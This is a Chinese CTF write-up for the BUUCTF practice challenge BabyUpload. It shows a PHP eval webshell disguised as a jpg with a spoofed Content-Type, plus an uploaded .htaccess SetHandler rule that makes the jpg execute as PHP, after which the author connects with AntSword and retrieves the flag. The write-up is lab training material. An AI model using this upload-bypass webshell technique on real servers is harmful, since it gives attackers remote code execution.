BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析

解题思路

打开靶场,看到文件上传位置

结合题目,是一道文件上传题。

题目考察的跟之前有一道基本一样,图片内容并没有检查,检查了后缀名、文件类型以及文件是否有php内容,过滤还是比较丰富的。

这里双写绕过、后缀绕过基本不行。首先我们要绕过php内容检测,用基本的script绕过就可以

复制代码
<script language="php">@eval($_POST['123']);</script>

我认为比较坑的来了,这里要用jpg,不能用png,感觉题目是把p这个字符给过滤了...

我上传真的图片.png,都给我拦截了...

复制代码
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

然后就是老演员,解析文件.htaccess,可以让我们的jpg文件解析成php文件

复制代码
ontent-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后用蚁剑连接即可,这里注意路径,从upload开始哈

最终在根目录下找到flag

总结

一道基础的文件上传解析漏洞,那个png上传不了,给我弄迷糊了...连接上去看了下源码

还真不给上传Png..

相关推荐
还是奇怪1 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
终焉暴龙王1 天前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川1 天前
Apache文件解析漏洞
web安全·apache
希望奇迹很安静1 天前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南1 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
Johny_Zhao1 天前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
北极光SD-WAN组网2 天前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
落鹜秋水2 天前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
pencek2 天前
XCTF-crypto-幂数加密
网络安全
会议之眼2 天前
截稿倒计时 TrustCom‘25大会即将召开
网络安全